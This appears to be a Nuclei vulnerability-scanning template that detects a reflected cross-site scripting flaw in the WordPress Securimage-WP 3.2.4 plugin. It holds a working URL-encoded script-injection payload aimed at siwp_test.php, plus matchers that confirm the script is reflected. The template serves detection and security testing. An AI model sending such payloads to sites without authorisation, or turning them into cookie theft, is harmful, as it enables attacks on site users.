nuclei-templates/http/vulnerabilities/wordpress/wp-securimage-xss.yaml

39 lines
1.2 KiB
YAML
Raw Normal View History

2021-07-11 02:10:35 +00:00
id: wp-securimage-xss
info:
name: WordPress Securimage-WP 3.2.4 - Cross-Site Scripting
2021-07-11 02:10:35 +00:00
author: daffainfo
severity: high
description: WordPress Securimage-WP 3.2.4 plugin contains a cross-site scripting vulnerability via siwp_test.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://www.exploit-db.com/exploits/38510
- http://web.archive.org/web/20210123054214/https://www.securityfocus.com/bid/59816/info
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
tags: edb,wordpress,xss,wp-plugin
2021-07-11 02:10:35 +00:00
http:
2021-07-11 02:10:35 +00:00
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(1)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/09/23